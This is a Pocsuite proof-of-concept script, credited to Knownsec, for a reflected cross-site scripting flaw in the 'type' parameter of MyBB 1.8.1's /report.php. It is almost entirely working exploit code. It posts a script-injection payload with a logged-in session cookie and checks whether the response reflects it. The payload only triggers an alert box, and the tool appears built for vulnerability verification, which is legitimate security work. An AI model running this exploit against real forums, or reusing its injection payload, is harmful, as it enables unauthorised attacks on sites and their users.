Mybb 1.8.1 /report.php 跨站脚本漏洞

                                                #!/usr/bin/env python
# coding: utf-8


import re

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from termcolor import cprint


class TestPOC(POCBase):
    vulID = '1629'
    version = '1'
    author = ['chensy @ Knownsec']
    vulDate = '2014-11-17'
    createDate = '2014-11-19'
    updateDate = '2014-11-19'
    references = ['http://www.beebeeto.com/pdb/poc-2014-0145']
    name = 'Mybb 1.8.1 /report.php 跨站脚本漏洞 POC'
    appPowerLink = 'http://www.mybb.com/'
    appName = 'Mybb'
    appVersion = '1.8.x'
    vulType = 'Cross Site Scripting'
    desc = '''
        Mybb <= 1.8.1 /report.php 对传递的参数 'type' 过滤不全，
        并且将其作为返回输出内容输出，造成反射型XSS（需要登录）。
    '''

    samples = ['']

    def _verify(self):
        result = {}
        # need --cookie provide _SESSID which has logged
        if 'Cookie' not in self.headers:
            cprint('[-] Please provide \'--cookie\' parameter.', 'red')
            return self.parse_verify(None)

        vul_url = '/report.php?'
        payload = 'type=XSS"><script>alert(123456)</script><'

        response = req.post(self.url + vul_url + payload, headers=self.headers)
        m = re.compile(u'><script>alert\(123456\)</script><').findall(response.content)

        if m:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + payload

        return self.parse_verify(result)

    def _attack(self):
        return self._verify()

    def parse_verify(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')

        return output


register(TestPOC)